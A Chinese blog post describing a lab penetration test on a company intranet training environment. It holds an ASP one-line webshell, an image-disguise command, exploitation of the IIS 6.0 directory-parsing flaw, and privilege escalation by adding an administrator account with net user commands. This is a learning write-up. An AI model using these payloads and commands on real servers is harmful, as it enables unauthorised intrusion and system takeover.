记录自己的第一次完整拿站

记录自己的第一次完整拿站

环境:公司内网虚拟环境

等级:基础入门工作考核

注:此处操作省略部分信息收集和其它漏洞测试步骤

如:

后门寻找:目录枚举获得

账号密码:sql注入获得

    服务器信息:sql注入获得

(一)WebShell


管理界面提供了完整的服务器信息,包含数据库文件地址


浏览后台我们发现存在大量的上传界面,所以上传漏洞变成了我们的切入点

尝试发现只支持图片类型上传

尝试一:图片马上传  

语句:

一句话asp马:<%eval request("a")%>

制作图片马:copy 2.jpg/b + 1.asp/a 1.jpg

上传结果是我们的图片马被重命名,无法正常执行



尝试二:

我们之前的信息搜集中已经发现IIS版本6.0,

这里可以联想到IIS 6.0的解析漏洞

这里简单科普:

IIS 6.0解析漏洞主要有两种:漏洞1:在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。IIS解析漏洞2:网站上传图片的时候,将网页木马文件的名字改成“*.asp;.jpg”,也同样会被 IIS 当作 asp 文件来解析并执行。例如上传一个图片文件,名字叫“vidun.asp;.jpg”的木马文件,该文件可以被当作 asp 文件解析并执行。

关于第二种解析漏洞,我们可以构造“1.asp;.jpg”文件,然而结果显而易见,文件会被重命名,并不是我们想要的asp文件。

所以我们的关注点回到第一种解析漏洞上来:

关键词:文件夹创建


我们继续后台发现,数据备份界面提供了数据库功能,而且还提供了文件夹自动创建功能

所以,新的尝试开始。


我们在图片文件夹(upfile)下创建了一个新的文件夹song.asp

然后重新进行之前的上传图片马操作,

并使用burpsuite改包修改图片马上传位置到/upfile/song.asp/下



我们可以看到是我们想要的路径,并且,文件被重名了了,不过没有关系~


接下来,掏出珍藏版过刀菜狗(手动滑稽)

注:使用被修改后的文件名连接


连接成功!


(二)提权

使用菜刀上传asp大马 / cmd命令工具 / pr 工具


借助asp马运行cmd


借助pr工具创建系统用户并提权

net user xxx 123456 /add


net localgroup administrators xxx /add


tasklist /svc


netstat -nao


使用账号密码远程登陆


注:像此处window server 2003可能会遇到服务器超出最大允许连接数的情况原因是我们平时在使用服务器操作系统的时候,往往是登录远程桌面后是直接关闭远程桌面窗口,而不是选择注销的方式来退出,那么实际上远程会话并没有释放掉,而是继续保留在服务器端,这样就会占用总的链接数。当这个数量达到最大允许值时就会出现超过远程连接会话数,从而导致其它用户无法登录到系统。

解决方式:mstsc /admin (强行注销其他用户并登陆)

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,219评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,363评论 1 293
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,933评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,020评论 0 206
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,400评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,640评论 1 219
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,896评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,597评论 0 199
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,327评论 1 244
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,581评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,072评论 1 261
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,399评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,054评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,083评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,849评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,672评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,585评论 2 270

推荐阅读更多精彩内容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 20,323评论 2 13
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,690评论 0 9
  • 为什么会存在文件上传呢? 网站为了给用户更好的体验,也有助于提高业务效率。 一般的社会网络的web应用程序,博客,...
    青山i阅读 472评论 0 0
  • 当Fall站在这块蓝色的纱染山水前被电击一样迈不开脚,又沮丧地说店家不卖时,我霸气地说,走,我去给你买,这块纱是我...
    青蘭阅读 683评论 0 1
  • 像我说的电话是别人用来我找别人的,不是别人来找我的。你说我太自私了,太以自我为中心了。其实这话说的点重了,亲人和家...
    JOBO_ba14阅读 50评论 0 0